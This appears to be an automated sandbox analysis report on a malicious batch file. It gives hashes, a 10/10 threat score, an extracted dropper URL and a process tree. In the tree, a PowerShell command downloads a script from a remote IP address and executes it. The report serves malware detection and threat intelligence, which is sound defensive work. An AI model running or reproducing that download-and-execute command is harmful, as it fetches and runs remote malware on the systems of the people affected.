Analysis
-
max time kernel
100s -
max time network
99s -
platform
windows10_x64 -
resource
win10v200213 -
submitted
18-02-2020 01:10
General
-
Target
42HVHYvi.bat
-
Size
192B
-
MD5
a9075a0e43612a388eda0d4643037a34
-
SHA1
6bfb53b342e2518e07955676e5a8f18717970504
-
SHA256
811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366
-
SHA512
9a9275289c65b19cc5e4d94572b1e6dfbe84c47a028193d0c142a363e0b279e0cb217d2d63c759839730ec8158460da427cb9ac354a124a9f6ae73ab7fa063ee
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/42HVHYvi
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\42HVHYvi.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/42HVHYvi');Invoke-OCJPTYYSX;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB